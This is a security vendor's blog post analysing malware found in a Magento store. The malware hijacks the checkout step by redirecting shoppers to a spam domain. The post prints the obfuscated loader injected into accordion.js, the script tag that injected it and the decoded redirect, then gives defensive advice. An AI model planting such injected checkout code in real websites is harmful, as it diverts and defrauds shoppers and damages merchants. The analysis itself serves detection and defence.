Home Testimonials Company Support 1–888–873–0817
PRICING SUPPORT LOGIN
Home Notes Malware Signatures About

The checkout process is one of the most important steps for any e-commerce business. The user experience during this process will set the tone for the entire interaction and fortunately lead to a successful sale. Because of that fact, attackers have been targeting Magento installations in order to steal sensitive information (credit card data, paypal logins) and in this case, promote websites for their monetary gains.

During our malware investigation process, we found an interesting piece of code redirecting users during the checkout process to a page not intended by the website owner. After selecting the products and clicking on the “Proceed to checkout” the user was redirected to: hxxp://bestdealsweek[.]com

The malicious code was located inside "/js/varien/accordion.js" and here is the content (obfuscated):

var x="\'%kVg\'%YZaVn\'%(9\'%&%%(7%6\'%\'%hZiI^bZdji\'-\'\'YdXjbZci#adXVi^dc#]gZ[(9\',]iie(6$$WZhiYZVahlZZ`#Xdb\',\'\'\'8\'%YZaVn\'.(7",y="",w="",z;z=x['length'];
for(i=0;i<z;i++){y+=String['fromCharCode'](x['charCodeAt'](i)+11) }w=this['unescape'](y);this['eval'](w);

This particular file in addition to "/skin/frontend/base/default/js/opcheckout.js" create a Javascript Layer responsible for submitting step data to the checkout controller and interpreting controller responses to update the content of the checkout steps. This layer allows the checkout process to be completed without the browser having to load every request in a new page.

This is how the accordion.js was injected into the One Page checkout:

<script type="text/javascript"src="hxxps://domain/js/varien/accordion.js"></script> 

After decoding it, we can see the redirect:

var delay = 100;
setTimeout("document.localtion.href='hxxp://bestdealsweek.com'",delay);

This is one of the many injection techniques attackers have been using against Magento e-commerce sites to make a profit. To reduce the risks of such injections, we recommend keeping all software updated (themes, plugins, core files), using a Website Application Firewall, having a File Integrity Monitoring system to detect file modifications and taking regular backups.